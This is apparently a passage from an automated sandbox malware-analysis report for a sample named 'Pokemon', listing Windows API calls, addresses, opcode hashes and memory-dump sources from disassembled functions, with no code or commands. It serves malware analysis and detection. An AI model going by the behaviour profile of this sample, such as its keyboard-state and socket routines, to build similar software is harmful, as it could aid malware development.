                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 5f382e62a00513c06a103d11cff61040d841d20e661c52c9bee1f8102fafb69c
                                                                                                                                                                                                                                                                                      • Instruction ID: 6a4339cfe467ff56a837a342ff7fc71cd7edceaa3dcfaeaeb60c169a5c7870bf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f382e62a00513c06a103d11cff61040d841d20e661c52c9bee1f8102fafb69c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3091C071A00215BFEB019F98D885BFEB7B5FF04711F158429E980A72D2D7B8E941CB50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 001143C8
                                                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 001144D7
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001144E7
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0011467C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010169E: VariantInit.OLEAUT32(00000000), ref: 001016DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010169E: VariantCopy.OLEAUT32(?,?), ref: 001016E7
                                                                                                                                                                                                                                                                                        • Part of subcall function 0010169E: VariantClear.OLEAUT32(?), ref: 001016F3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                      • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                      • Opcode ID: e61def31163ab474f9b84a48d89682ce96539edbea4bad94d5b932fcd512b98b
                                                                                                                                                                                                                                                                                      • Instruction ID: 38f1d569911b22923296c85dce1dec783b665815670644745e285dffed896053
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e61def31163ab474f9b84a48d89682ce96539edbea4bad94d5b932fcd512b98b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC915A756083019FCB18DF24C4819AAB7E5FF89714F14892DF8899B352DB31ED46CB82
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?,?,000F0C4E), ref: 000F091B
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0936
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?,?), ref: 000F0944
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,000F0831,80070057,?), ref: 000F0954
                                                                                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001156AE
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 001157B6
                                                                                                                                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0011582C
                                                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00115837
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                      • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                      • Opcode ID: 6329a1a5b0078b2d0505f0c35eb74b2ab31eece64fcec4ac75dee141c4f67cf7
                                                                                                                                                                                                                                                                                      • Instruction ID: 6639067cf138fdbacb22e40862d198364ca02da397f81aca234a64785e9c6bb9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6329a1a5b0078b2d0505f0c35eb74b2ab31eece64fcec4ac75dee141c4f67cf7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B911671D0021DEFDF14DFA4D881AEEB7B9BF48310F104569E915A7292EB709A44DFA0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00122C1F
                                                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00122C51
                                                                                                                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00122C79
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00122CAF
                                                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00122CE9
                                                                                                                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00122CF7
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F43AD
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: GetCurrentThreadId.KERNEL32 ref: 000F43B4
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F2F00), ref: 000F43BB
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00122D7F
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FF292: Sleep.KERNEL32 ref: 000FF30A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 95d705af07ce79a4116fca3fa7539fa64608fe28bcbbdb007d4629f8c01e6272
                                                                                                                                                                                                                                                                                      • Instruction ID: 68fae247fa8fa086d78a0b599b5cc5255cfbb6fd05af788299da980483861ae0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95d705af07ce79a4116fca3fa7539fa64608fe28bcbbdb007d4629f8c01e6272
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E718F75A00219BFCB14EFA4D845AEEB7B1EF48310F118469E816EB351DB74AE51CB90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00128992
                                                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0012899E
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00128A79
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00128AAC
                                                                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,00000000), ref: 00128AE4
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 00128B06
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00128B1E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2351ce5ee3b6b5c9c91fe869909fc3980a75c968dd6cfd64fc5b55ff8c73efc7
                                                                                                                                                                                                                                                                                      • Instruction ID: cfadeeb08488b4556f5f97f84974b629f557eb407300b2076a08762324f98ddd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2351ce5ee3b6b5c9c91fe869909fc3980a75c968dd6cfd64fc5b55ff8c73efc7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5771C074A02224AFEF359F54E884FBABBB9FF49304F140459E84567261CF35A9A1DB20
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 000FB8C0
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FB8D5
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 000FB936
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 000FB964
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 000FB983
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 000FB9C4
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 000FB9E7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 26f0bea40b8515a781713a4d6c11c34e19748ba83711f366eb9eb24fe06e25c8
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f0c6e4ccac1d6179544da7436c97aeffd6f3b5dbd26f39de5531c5fe1e0c3a6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26f0bea40b8515a781713a4d6c11c34e19748ba83711f366eb9eb24fe06e25c8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF51CDA06086D93EFB364234C845BBABEE95B06304F088489E2D546CD2C7D8ECC4EB51
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 000FB6E0
                                                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 000FB6F5
                                                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 000FB756
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 000FB782
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 000FB79F
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 000FB7DE
                                                                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 000FB7FF
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6cb7c2f84dfc58a6ff3904d7a0d9b85ddfdd2617e52a7267ce5a09bcc6a5f162
                                                                                                                                                                                                                                                                                      • Instruction ID: e8dd83b9c02c317364969b1f3b6570bacbca65bef78d52bc88422dbaa386b78c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cb7c2f84dfc58a6ff3904d7a0d9b85ddfdd2617e52a7267ce5a09bcc6a5f162
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C51F3A0A087D93DFB329224CC15BBA7EE85B45344F0C8489E2D446CD2D794EC95FF50
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,000C5F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 000C57E3
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 000C585E
                                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 000C5879
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 000C589F
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,000C5F16,00000000,?,?,?,?,?,?,?,?,?,000C5F16,?), ref: 000C58BE
                                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,000C5F16,00000000,?,?,?,?,?,?,?,?,?,000C5F16,?), ref: 000C58F7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 60fb7e328a33a7b160526da6a1f9d66feb3d7bbcf570c67975a677b7725f7889
                                                                                                                                                                                                                                                                                      • Instruction ID: ecfcf017ab1dac4d5e72feed057408302d9ab3c098c33f6e94e32e118747ec35
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60fb7e328a33a7b160526da6a1f9d66feb3d7bbcf570c67975a677b7725f7889
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB519D74A00649AFCB10CFA8DC85FEEBBF8EB08311F14415EE952E7291D730A991CB61
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 000B30BB
                                                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 000B30C3
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 000B3151
                                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 000B317C
                                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 000B31D1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                      • Opcode ID: 4106511262632622f416417fdc0ad1fa2850179705e6759adac3a15e081b8cdd
                                                                                                                                                                                                                                                                                      • Instruction ID: 97fa4c9be74f1160da7b31ac348a7aa5c65b6d5263d088cdc4ce65d2b0eb6699
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4106511262632622f416417fdc0ad1fa2850179705e6759adac3a15e081b8cdd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95418334A00218ABCF20DFACCC95ADEBBF9AF44324F248555E815AB392D731DB55CB91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00113AD7
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113AAB: _wcslen.LIBCMT ref: 00113AF8
                                                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00111B6F
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00111B7E
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00111C26
                                                                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00111C56
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c833e186f3bcaaa52f3f14cec34477b7ead027eb3a4c39d3d31a2e164ce5ec06
                                                                                                                                                                                                                                                                                      • Instruction ID: d0e0f3fac91f31fa931c6c76176ad5966af7f93b46c40e4b57e2f145b1dc88c9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c833e186f3bcaaa52f3f14cec34477b7ead027eb3a4c39d3d31a2e164ce5ec06
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B241D231604114BFDB249F24D884BE9BBE9EF45324F148069F919AB292D774EDC1CBE1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000FD7CD,?), ref: 000FE714
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000FD7CD,?), ref: 000FE72D
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000FD7F0
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000FD82A
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FD8B0
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FD8C6
                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 000FD90C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                                                                      • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                      • Opcode ID: 8b77d46cd7c7c59b2e84e73362abb37f9347eb0e5e3bbf21da434d99628b66f6
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a0113623763f56498e7e2cc60558e35764df352f9cb28ef9a1decc6f961efba
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b77d46cd7c7c59b2e84e73362abb37f9347eb0e5e3bbf21da434d99628b66f6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E841967180525C9EDF52EBA0D985BED77F9AF08380F0000E7A605EB542EF34A789DB10
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 001238B8
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 001238EB
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00123920
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00123952
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0012397C
                                                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0012398D
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001239A7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
